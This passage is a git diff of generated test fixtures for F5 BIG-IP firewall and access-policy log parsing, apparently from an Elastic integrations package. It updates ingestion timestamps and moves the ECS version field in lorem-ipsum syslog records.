sundeo3076.internal.test Nequepor turQ tod [F5@rsitame acl_policy_name=nsectetu acl_policy_type=untexpli acl_rule_name=smo action=Reject hostname=acons3940.api.lan bigip_mgmt_ip=10.133.48.55 context_name=lab context_type=ela date_time=Mar 17 2019 17:35:40 dest_ip=10.134.141.37 dst_geo=oreve dest_port=2538 device_product=tali device_vendor=quamnih device_version=1.2492 drop_reason=reprehen errdefs_msgno=Exce errdefs_msg_name=tocca flow_id=tinvolu ip_protocol=ipv6 severity=low partition_name=iumt route_domain=mad sa_translation_pool=mpor sa_translation_type=eddoei source_ip=10.35.73.208 src_geo=dolo source_port=6552 source_user=tia translated_dest_ip=10.126.61.230 translated_dest_port=2068 translated_ip_protocol=dolor translated_route_domain=emUteni translated_source_ip=10.189.244.22 translated_source_port=734 translated_vlan=rinre vlan=6425", "event": { - "ingested": "2021-06-09T10:31:51.965594400Z" + "ingested": "2021-12-14T14:42:50.150110510Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ident uatur dquiaco2756.home uiine mve dolorema [F5@ditautf acl_policy_name=uisnostr acl_policy_type=oditautf acl_rule_name=nula action=Established hostname=suscipit587.www.localhost bigip_mgmt_ip=10.81.154.115 context_name=ita context_type=aeratvol date_time=Apr 01 2019 00:38:14 dest_ip=10.194.94.1 dst_geo=ostr dest_port=575 device_product=boreetd device_vendor=ueporro device_version=1.4044 drop_reason=oluptat errdefs_msgno=olors errdefs_msg_name=mSecti flow_id=ius ip_protocol=icmp severity=very-high partition_name=xerci route_domain=qua sa_translation_pool=iaecons sa_translation_type=pteurs source_ip=10.35.65.72 src_geo=veni source_port=3387 source_user=reseo translated_dest_ip=10.239.194.105 translated_dest_port=3629 translated_ip_protocol=isnos translated_route_domain=ntin translated_source_ip=10.240.94.109 translated_source_port=5437 translated_vlan=ono vlan=573", "event": { - "ingested": 
"2021-06-09T10:31:51.965599100Z" + "ingested": "2021-12-14T14:42:50.150110897Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "consequ ine hend3901.www.localdomain nsecte miurere tat [F5@pitlabor acl_policy_name=upi acl_policy_type=olupta acl_rule_name=ape action=Established hostname=mnisiut6146.internal.local bigip_mgmt_ip=10.52.70.192 context_name=empor context_type=ate date_time=Apr 15 2019 07:40:49 dest_ip=10.234.254.96 dst_geo=obeatae dest_port=2042 device_product=orem device_vendor=dquian device_version=1.2307 drop_reason=uis errdefs_msgno=emagnaal errdefs_msg_name=uunturm flow_id=nonnumq ip_protocol=ggp severity=very-high partition_name=ntocca route_domain=emquelau sa_translation_pool=adolorsi sa_translation_type=lupt source_ip=10.38.253.213 src_geo=ncidu source_port=3369 source_user=ionem translated_dest_ip=10.248.72.104 translated_dest_port=7485 translated_ip_protocol=cusan translated_route_domain=ivelit translated_source_ip=10.150.56.227 translated_source_port=4686 translated_vlan=isnost vlan=4697", "event": { - "ingested": "2021-06-09T10:31:51.965603900Z" + "ingested": "2021-12-14T14:42:50.150111284Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "urQu idol fici312.api.host eri pitlab riosamn [F5@Malo acl_policy_name=onse acl_policy_type=enatuse acl_rule_name=veritat action=Reject hostname=borios1067.www5.home bigip_mgmt_ip=10.218.15.164 context_name=ntNeque context_type=magnidol date_time=Apr 29 2019 14:43:23 dest_ip=10.56.60.3 dst_geo=aaliq dest_port=2143 device_product=gel device_vendor=modt device_version=1.2031 drop_reason=mvolu errdefs_msgno=agn errdefs_msg_name=eritinvo flow_id=aliq ip_protocol=rdp severity=very-high partition_name=uisautei route_domain=labor sa_translation_pool=ihilmol sa_translation_type=scinge source_ip=10.62.218.239 src_geo=yCiceroi source_port=166 
source_user=reh translated_dest_ip=10.73.172.186 translated_dest_port=3510 translated_ip_protocol=itte translated_route_domain=niamquis translated_source_ip=10.203.193.134 translated_source_port=6251 translated_vlan=riosa vlan=7445", "event": { - "ingested": "2021-06-09T10:31:51.965608500Z" + "ingested": "2021-12-14T14:42:50.150111676Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ore ptatema poriss2289.localdomain luptat ficiad saquaea [F5@archi acl_policy_name=caboNe acl_policy_type=ptate acl_rule_name=enimips action=Established hostname=msequ323.www.example bigip_mgmt_ip=10.60.20.76 context_name=seq context_type=uae date_time=May 13 2019 21:45:57 dest_ip=10.244.241.67 dst_geo=quaeabi dest_port=5701 device_product=ost device_vendor=mave device_version=1.2555 drop_reason=aev errdefs_msgno=uovolup errdefs_msg_name=tMaloru flow_id=rum ip_protocol=ipv6-icmp severity=very-high partition_name=ptassita route_domain=ionemul sa_translation_pool=orema sa_translation_type=its source_ip=10.10.46.43 src_geo=stiaec source_port=7346 source_user=nev translated_dest_ip=10.136.211.234 translated_dest_port=4126 translated_ip_protocol=lamcor translated_route_domain=rorsitv translated_source_ip=10.131.127.113 translated_source_port=853 translated_vlan=iamqu vlan=1324", "event": { - "ingested": "2021-06-09T10:31:51.965614600Z" + "ingested": "2021-12-14T14:42:50.150112065Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mwrit dminimve madminim5473.mail.example reeuf orinrepr tinvo [F5@oru acl_policy_name=ainc acl_policy_type=aeab acl_rule_name=iat action=Closed hostname=tdolorem813.internal.host bigip_mgmt_ip=10.50.177.151 context_name=rsitam context_type=aliqui date_time=May 28 2019 04:48:31 dest_ip=10.206.65.159 dst_geo=fdeFini dest_port=1295 device_product=eetdolo device_vendor=issuscip device_version=1.3291 
drop_reason=tqu errdefs_msgno=rinc errdefs_msg_name=hender flow_id=sBonor ip_protocol=rdp severity=high partition_name=ercitati route_domain=lapa sa_translation_pool=enia sa_translation_type=atis source_ip=10.233.181.250 src_geo=isiuta source_port=2868 source_user=ugiatq translated_dest_ip=10.187.237.220 translated_dest_port=7744 translated_ip_protocol=eumfu translated_route_domain=remap translated_source_ip=10.248.0.74 translated_source_port=6349 translated_vlan=tru vlan=2520", "event": { - "ingested": "2021-06-09T10:31:51.965636800Z" + "ingested": "2021-12-14T14:42:50.150112479Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "isautem eiusm assit1598.www5.invalid archite eruntm iades [F5@mremape acl_policy_name=nimad acl_policy_type=ionemu acl_rule_name=nul action=Established hostname=volupt4626.internal.test bigip_mgmt_ip=10.189.43.11 context_name=asper context_type=eeu date_time=Jun 11 2019 11:51:06 dest_ip=10.193.169.102 dst_geo=olab dest_port=629 device_product=olore device_vendor=mSecti device_version=1.2859 drop_reason=idid errdefs_msgno=ela errdefs_msg_name=fugits flow_id=litseddo ip_protocol=igmp severity=medium partition_name=ptasn route_domain=amrem sa_translation_pool=umdolor sa_translation_type=iamq source_ip=10.248.248.120 src_geo=ationemu source_port=1282 source_user=iatn translated_dest_ip=10.96.223.46 translated_dest_port=3654 translated_ip_protocol=pern translated_route_domain=ptasn translated_source_ip=10.80.129.81 translated_source_port=4827 translated_vlan=tat vlan=5084", "event": { - "ingested": "2021-06-09T10:31:51.965643300Z" + "ingested": "2021-12-14T14:42:50.150112866Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eruntmo lumdolo urmagnid2749.api.host imip taspe siutaliq [F5@turadipi acl_policy_name=tMalo acl_policy_type=veni acl_rule_name=rspi action=Closed 
hostname=ntium5103.www5.localhost bigip_mgmt_ip=10.66.106.186 context_name=uatD context_type=reh date_time=Jun 25 2019 18:53:40 dest_ip=10.36.14.238 dst_geo=metco dest_port=4740 device_product=ilmoles device_vendor=xeaco device_version=1.1910 drop_reason=ccaecat errdefs_msgno=radip errdefs_msg_name=secil flow_id=totamr ip_protocol=udp severity=very-high partition_name=iciat route_domain=uira sa_translation_pool=orio sa_translation_type=mseq source_ip=10.102.109.199 src_geo=iono source_port=2061 source_user=tNequ translated_dest_ip=10.173.114.63 translated_dest_port=5877 translated_ip_protocol=tatisetq translated_route_domain=eabilloi translated_source_ip=10.91.115.139 translated_source_port=412 translated_vlan=eroi vlan=2077", "event": { - "ingested": "2021-06-09T10:31:51.965652400Z" + "ingested": "2021-12-14T14:42:50.150113297Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "riatur amrema illum2978.internal.home rumetMa entor urere [F5@involu acl_policy_name=qui acl_policy_type=aliqu acl_rule_name=sita action=Drop hostname=orpori3334.www.local bigip_mgmt_ip=10.198.157.122 context_name=ncu context_type=quatu date_time=Jul 10 2019 01:56:14 dest_ip=10.239.90.72 dst_geo=iratio dest_port=7700 device_product=its device_vendor=agn device_version=1.3690 drop_reason=ntmo errdefs_msgno=iur errdefs_msg_name=aboNemo flow_id=tsedquia ip_protocol=udp severity=very-high partition_name=tatiset route_domain=enim sa_translation_pool=gnido sa_translation_type=iamq source_ip=10.159.155.88 src_geo=uisa source_port=7034 source_user=iquipex translated_dest_ip=10.0.175.17 translated_dest_port=5236 translated_ip_protocol=tempori translated_route_domain=sedquian translated_source_ip=10.221.223.127 translated_source_port=2687 translated_vlan=ira vlan=3007", "event": { - "ingested": "2021-06-09T10:31:51.965657900Z" + "ingested": "2021-12-14T14:42:50.150113685Z" + }, + "ecs": { + "version": "1.12.0" }, 
"tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "idolor umdo sequatu7142.internal.corp ipsaqu asun rsitam [F5@magn acl_policy_name=amcola acl_policy_type=eumiurer acl_rule_name=umf action=Established hostname=equu7361.www5.localdomain bigip_mgmt_ip=10.30.20.187 context_name=rsinto context_type=nonnumqu date_time=Jul 24 2019 08:58:48 dest_ip=10.103.47.100 dst_geo=chitect dest_port=5316 device_product=fug device_vendor=ulpaq device_version=1.6302 drop_reason=piscivel errdefs_msgno=ueporr errdefs_msg_name=udex flow_id=ipexeac ip_protocol=tcp severity=low partition_name=isci route_domain=archi sa_translation_pool=rsitame sa_translation_type=qui source_ip=10.7.212.201 src_geo=ion source_port=949 source_user=ugiat translated_dest_ip=10.252.136.130 translated_dest_port=5601 translated_ip_protocol=expl translated_route_domain=animi translated_source_ip=10.189.70.237 translated_source_port=1457 translated_vlan=tnul vlan=24", "event": { - "ingested": "2021-06-09T10:31:51.965663200Z" + "ingested": "2021-12-14T14:42:50.150114080Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "radip amremap dolorsit64.www.local uredo uamni nisi [F5@onsecte acl_policy_name=iono acl_policy_type=secillum acl_rule_name=sequatD action=Established hostname=tse2979.internal.localhost bigip_mgmt_ip=10.242.121.165 context_name=aut context_type=eriti date_time=Aug 07 2019 16:01:23 dest_ip=10.88.229.78 dst_geo=imadmi dest_port=2642 device_product=tevelite device_vendor=cto device_version=1.2037 drop_reason=mquiado errdefs_msgno=agn errdefs_msg_name=dip flow_id=urmag ip_protocol=tcp severity=high partition_name=laboreet route_domain=tutlabo sa_translation_pool=incid sa_translation_type=der source_ip=10.83.105.69 src_geo=usm source_port=2153 source_user=mni translated_dest_ip=10.102.109.194 translated_dest_port=2324 translated_ip_protocol=nor translated_route_domain=saut 
translated_source_ip=10.60.224.93 translated_source_port=1508 translated_vlan=deomnis vlan=354", "event": { - "ingested": "2021-06-09T10:31:51.965668800Z" + "ingested": "2021-12-14T14:42:50.150114458Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tla nimve edutpe1255.internal.lan nimadm cepte paquioff [F5@ictasun acl_policy_name=iumto acl_policy_type=ciun acl_rule_name=prehe action=Accept hostname=uisnostr2390.mail.domain bigip_mgmt_ip=10.251.167.219 context_name=eaco context_type=oremeu date_time=Aug 21 2019 23:03:57 dest_ip=10.14.251.18 dst_geo=tenbyCi dest_port=4371 device_product=citation device_vendor=spernatu device_version=1.7314 drop_reason=giatq errdefs_msgno=tion errdefs_msg_name=tNeque flow_id=uidolore ip_protocol=rdp severity=medium partition_name=usB route_domain=magnaali sa_translation_pool=istenatu sa_translation_type=roqui source_ip=10.17.20.93 src_geo=eritqu source_port=4368 source_user=Uteni translated_dest_ip=10.181.134.69 translated_dest_port=551 translated_ip_protocol=norum translated_route_domain=emUten translated_source_ip=10.219.174.45 translated_source_port=4055 translated_vlan=idolo vlan=968", "event": { - "ingested": "2021-06-09T10:31:51.965674Z" + "ingested": "2021-12-14T14:42:50.150114839Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mmodicon nisis edquia4523.www.host remap ntium veniamqu [F5@equat acl_policy_name=reeu acl_policy_type=atemacc acl_rule_name=rsitvolu action=Accept hostname=luptate4811.mail.example bigip_mgmt_ip=10.30.117.82 context_name=destlabo context_type=fficia date_time=Sep 05 2019 06:06:31 dest_ip=10.245.75.229 dst_geo=elaud dest_port=4916 device_product=eaqueip device_vendor=emUten device_version=1.596 drop_reason=itseddoe errdefs_msgno=iti errdefs_msg_name=evitaedi flow_id=ionulamc ip_protocol=tcp severity=high partition_name=culp 
route_domain=Ciceroin sa_translation_pool=aeco sa_translation_type=olores source_ip=10.223.99.90 src_geo=adminim source_port=4324 source_user=numqua translated_dest_ip=10.28.233.253 translated_dest_port=1159 translated_ip_protocol=mUten translated_route_domain=eursint translated_source_ip=10.37.14.20 translated_source_port=6531 translated_vlan=teurs vlan=4919", "event": { - "ingested": "2021-06-09T10:31:51.965679300Z" + "ingested": "2021-12-14T14:42:50.150115262Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "aaliq nos uaUteni562.www.test deF dutpe tseddoei [F5@byCi acl_policy_name=odic acl_policy_type=chitecto acl_rule_name=nimadm action=Closed hostname=lites1614.www.corp bigip_mgmt_ip=10.125.20.22 context_name=olu context_type=ectet date_time=Sep 19 2019 13:09:05 dest_ip=10.121.189.113 dst_geo=tess dest_port=4686 device_product=xeacom device_vendor=adminim device_version=1.95 drop_reason=henderi errdefs_msgno=rainc errdefs_msg_name=dminim flow_id=sse ip_protocol=tcp severity=high partition_name=umexe route_domain=Sedu sa_translation_pool=tetur sa_translation_type=ern source_ip=10.50.61.114 src_geo=nvento source_port=649 source_user=qua translated_dest_ip=10.57.85.113 translated_dest_port=1024 translated_ip_protocol=itquii translated_route_domain=psu translated_source_ip=10.8.32.17 translated_source_port=3788 translated_vlan=nem vlan=5883", "event": { - "ingested": "2021-06-09T10:31:51.965684600Z" + "ingested": "2021-12-14T14:42:50.150115648Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sitasper agni ivelit1640.internal.lan iscive prehende volup [F5@nimi acl_policy_name=niamqu acl_policy_type=uioffi acl_rule_name=suntin action=Closed hostname=lorinrep7686.mail.corp bigip_mgmt_ip=10.200.28.55 context_name=ineavol context_type=abor date_time=Oct 03 2019 20:11:40 dest_ip=10.232.122.152 
dst_geo=voluptat dest_port=1549 device_product=ipi device_vendor=lamcor device_version=1.3064 drop_reason=litesse errdefs_msgno=tam errdefs_msg_name=uovo flow_id=scivelit ip_protocol=icmp severity=low partition_name=empo route_domain=apa sa_translation_pool=colab sa_translation_type=sistenat source_ip=10.215.224.27 src_geo=Sedutper source_port=6726 source_user=ficiade translated_dest_ip=10.113.78.101 translated_dest_port=2707 translated_ip_protocol=amqua translated_route_domain=nsequatu translated_source_ip=10.181.63.82 translated_source_port=168 translated_vlan=tse vlan=4029", "event": { - "ingested": "2021-06-09T10:31:51.965689800Z" + "ingested": "2021-12-14T14:42:50.150116047Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ueip amvo dolorsi306.www5.local tten erit asiarch [F5@tob acl_policy_name=tiae acl_policy_type=imipsamv acl_rule_name=doeiu action=Established hostname=nderit6272.mail.example bigip_mgmt_ip=10.177.14.106 context_name=natuser context_type=olupt date_time=Oct 18 2019 03:14:14 dest_ip=10.239.142.115 dst_geo=nsec dest_port=6720 device_product=siarchi device_vendor=etq device_version=1.4522 drop_reason=archit errdefs_msgno=nde errdefs_msg_name=tNequepo flow_id=byCicer ip_protocol=ipv6 severity=medium partition_name=ipit route_domain=tdolorem sa_translation_pool=nderitin sa_translation_type=mquiado source_ip=10.169.95.128 src_geo=reeufugi source_port=7737 source_user=ofd translated_dest_ip=10.139.20.223 translated_dest_port=114 translated_ip_protocol=porincid translated_route_domain=tisetqu translated_source_ip=10.243.43.168 translated_source_port=2110 translated_vlan=ehenderi vlan=2215", "event": { - "ingested": "2021-06-09T10:31:51.965695Z" + "ingested": "2021-12-14T14:42:50.150116520Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ipsu iden oreseo1541.mail.domain boriosam 
lites col [F5@litsedd acl_policy_name=mnis acl_policy_type=ainci acl_rule_name=aturve action=Established hostname=ntu1279.mail.lan bigip_mgmt_ip=10.92.168.198 context_name=rume context_type=uptate date_time=Nov 01 2019 10:16:48 dest_ip=10.115.225.57 dst_geo=orsit dest_port=3315 device_product=mnis device_vendor=tametco device_version=1.7456 drop_reason=inc errdefs_msgno=rroqui errdefs_msg_name=amr flow_id=mfug ip_protocol=tcp severity=low partition_name=mid route_domain=henderi sa_translation_pool=consec sa_translation_type=dquia source_ip=10.90.93.4 src_geo=rehe source_port=3382 source_user=adminima translated_dest_ip=10.39.100.88 translated_dest_port=5195 translated_ip_protocol=lup translated_route_domain=rsi translated_source_ip=10.18.176.44 translated_source_port=7284 translated_vlan=Utenimad vlan=4305", "event": { - "ingested": "2021-06-09T10:31:51.965700100Z" + "ingested": "2021-12-14T14:42:50.150116910Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Bon amquisno mullam6505.www.localhost siarch oloremi ididu [F5@uov acl_policy_name=ncidid acl_policy_type=audantiu acl_rule_name=lmolest action=Reject hostname=essequam1161.domain bigip_mgmt_ip=10.49.68.8 context_name=temUte context_type=idest date_time=Nov 15 2019 17:19:22 dest_ip=10.8.247.249 dst_geo=enimip dest_port=3957 device_product=ataevit device_vendor=ficiad device_version=1.2909 drop_reason=taspe errdefs_msgno=empori errdefs_msg_name=mipsum flow_id=tium ip_protocol=tcp severity=very-high partition_name=ota route_domain=boriosa sa_translation_pool=eprehen sa_translation_type=rehen source_ip=10.163.203.191 src_geo=exeacom source_port=2599 source_user=tlab translated_dest_ip=10.193.43.135 translated_dest_port=4650 translated_ip_protocol=iaeconse translated_route_domain=onevol translated_source_ip=10.173.13.179 translated_source_port=1211 translated_vlan=ptasn vlan=3791", "event": { - "ingested": 
"2021-06-09T10:31:51.965705400Z" + "ingested": "2021-12-14T14:42:50.150117304Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ctetur amqui itatise2264.invalid lup cipitla niam [F5@mullamc acl_policy_name=umtota acl_policy_type=ssecil acl_rule_name=xplic action=Closed hostname=cipitl2184.localdomain bigip_mgmt_ip=10.240.47.113 context_name=uisnost context_type=snul date_time=Nov 30 2019 00:21:57 dest_ip=10.191.241.249 dst_geo=Loremips dest_port=4361 device_product=tiset device_vendor=ciade device_version=1.7726 drop_reason=equ errdefs_msgno=rror errdefs_msg_name=Exce flow_id=uae ip_protocol=ggp severity=high partition_name=umdol route_domain=nseq sa_translation_pool=autodita sa_translation_type=loreme source_ip=10.84.64.28 src_geo=par source_port=3938 source_user=ull translated_dest_ip=10.209.226.7 translated_dest_port=7745 translated_ip_protocol=aeabi translated_route_domain=ore translated_source_ip=10.31.147.51 translated_source_port=7780 translated_vlan=ptate vlan=3154", "event": { - "ingested": "2021-06-09T10:31:51.965710700Z" + "ingested": "2021-12-14T14:42:50.150117881Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "fugit dantiu ntutla1447.invalid strude rautodi Loremips [F5@mestqui acl_policy_name=tect acl_policy_type=odtem acl_rule_name=ite action=Closed hostname=item3647.home bigip_mgmt_ip=10.32.20.4 context_name=olupta context_type=dents date_time=Dec 14 2019 07:24:31 dest_ip=10.166.40.137 dst_geo=oremipsu dest_port=5644 device_product=idolor device_vendor=tionem device_version=1.292 drop_reason=oinB errdefs_msgno=tateve errdefs_msg_name=rsitvo flow_id=enatuser ip_protocol=tcp severity=high partition_name=sistena route_domain=reetdolo sa_translation_pool=psam sa_translation_type=litseddo source_ip=10.225.189.229 src_geo=odtem source_port=2287 source_user=odtemp 
translated_dest_ip=10.86.1.244 translated_dest_port=7101 translated_ip_protocol=rinci translated_route_domain=uamestqu translated_source_ip=10.52.13.192 translated_source_port=4714 translated_vlan=remagna vlan=439", "event": { - "ingested": "2021-06-09T10:31:51.965715700Z" + "ingested": "2021-12-14T14:42:50.150118279Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/f5/data_stream/bigipapm/_dev/test/pipeline/test-generated.log-expected.json b/packages/f5/data_stream/bigipapm/_dev/test/pipeline/test-generated.log-expected.json index e66ebdd6cf9..baa95613555 100644 --- a/packages/f5/data_stream/bigipapm/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/f5/data_stream/bigipapm/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "January 2016/01/29 06:09:59 aliqu high equepor[6720]: 01490106: :dolore: sequa: AD module: authentication with 'abo' failed: Preauthentication failed, principal name: squira. success reeufugi", "event": { - "ingested": "2021-06-09T10:31:52.608600300Z" + "ingested": "2021-12-14T14:42:51.960173505Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2016/02/12 13:12:33 billoi medium orev[6153]: 01490504: :tatemU: deF: sist1803.mail.local can not be resolved.", "event": { - "ingested": "2021-06-09T10:31:52.608618200Z" + "ingested": "2021-12-14T14:42:51.960175866Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2016/02/26 20:15:08 aqui low sSMTP[1166]: isetq", "event": { - "ingested": "2021-06-09T10:31:52.608641800Z" + "ingested": "2021-12-14T14:42:51.960176386Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 2016/03/12 03:17:42 seq high crond[5738]: (ccaecat) veleumi", "event": { - "ingested": "2021-06-09T10:31:52.608647800Z" + "ingested": "2021-12-14T14:42:51.960176790Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 2016/03/26 10:20:16 ude very-high veri[5990]: 01490113: :tempo: inv: session.user.clientip is 10.134.175.248", "event": { - "ingested": "2021-06-09T10:31:52.608652200Z" + "ingested": "2021-12-14T14:42:51.960177190Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2016/04/09 17:22:51 lupta low rsitvolu[2044]: 01490128: :pori: occ: Webtop ect assigned", "event": { - "ingested": "2021-06-09T10:31:52.608656600Z" 
+ "ingested": "2021-12-14T14:42:51.960177591Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2016/04/24 00:25:25 aedic high gni: [syslog-ng]", "event": { - "ingested": "2021-06-09T10:31:52.608660400Z" + "ingested": "2021-12-14T14:42:51.960179768Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 2016/05/08 07:27:59 labor low isqu: 01490167: :uis: Current snapshot ID: idolore updated inside session db for access profile: onse", "event": { - "ingested": "2021-06-09T10:31:52.608664300Z" + "ingested": "2021-12-14T14:42:51.960180185Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 2016/05/22 14:30:33 metcon low emeumfug[6823]: 01490505: :emporinc: untutlab: tem", "event": { - "ingested": "2021-06-09T10:31:52.608668200Z" + "ingested": "2021-12-14T14:42:51.960180589Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 2016/06/05 21:33:08 tessec very-high ali[6446]: sSMTP: ", "event": { - "ingested": "2021-06-09T10:31:52.608671800Z" + "ingested": "2021-12-14T14:42:51.960181211Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 2016/06/20 04:35:42 riat medium atvol[98]: 014d0044: :uames: tati", "event": { - "ingested": "2021-06-09T10:31:52.608675600Z" + "ingested": "2021-12-14T14:42:51.960181594Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 2016/07/04 11:38:16 sinto very-high CSed[2857]: 01490514: :utlabore: ecillu: Access encountered error: success. 
File: mnisist, Function: deny, Line: icons", "event": { - "ingested": "2021-06-09T10:31:52.608679500Z" + "ingested": "2021-12-14T14:42:51.960182187Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 2016/07/18 18:40:50 lum high CROND[1675]: (sitvolup) CMD (cancel)", "event": { - "ingested": "2021-06-09T10:31:52.608683200Z" + "ingested": "2021-12-14T14:42:51.960182582Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2016/08/02 01:43:25 uipe very-high siarchi[2289]: 01490500: :aliqu: olupta:mipsumd:eFinib: New session from client IP 10.204.123.107 (ST=saute/CC=ercit/C=usmodt) at VIP 10.225.160.182 Listener mque", "event": { - "ingested": "2021-06-09T10:31:52.608686800Z" + "ingested": "2021-12-14T14:42:51.960182968Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2016/08/16 08:45:59 dol high quiratio[3386]: 01490511: :tisetq: tevelite: Initializing Access profile orporiss with max concurrent user sessions limit: 4739", "event": { - "ingested": "2021-06-09T10:31:52.608690500Z" + "ingested": "2021-12-14T14:42:51.960183368Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2016/08/30 15:48:33 paquioff medium derit[4688]: 01490544: :hende: piscin: Received client info - https://mail.example.com/laboree/tfu.html?liqu=eporr#xeacomm", "event": { - "ingested": "2021-06-09T10:31:52.608695100Z" + "ingested": "2021-12-14T14:42:51.960183781Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 2016/09/13 22:51:07 fugiatnu high tobea[2364]: 014d0001: :tateve: ctx: itinvol, SERVER : eavolup", "event": { - "ingested": 
"2021-06-09T10:31:52.608699200Z" + "ingested": "2021-12-14T14:42:51.960184292Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 2016/09/28 05:53:42 remag very-high abor[5983]: 01490103: :tquiin: tse: Retry Username 'tenimad'", "event": { - "ingested": "2021-06-09T10:31:52.608703100Z" + "ingested": "2021-12-14T14:42:51.960184665Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 2016/10/12 12:56:16 niamqui low amcol[5625]: 01490113: :ipisci: gitsed: session.server.network.port is 4374", "event": { - "ingested": "2021-06-09T10:31:52.608706900Z" + "ingested": "2021-12-14T14:42:51.960185051Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 2016/10/26 19:58:50 nturma low cusant[4946]: 01490106: :etur: itecto: AD module: authentication with 'reetdol' failed: Preauthentication failed, principal name: totamre. 
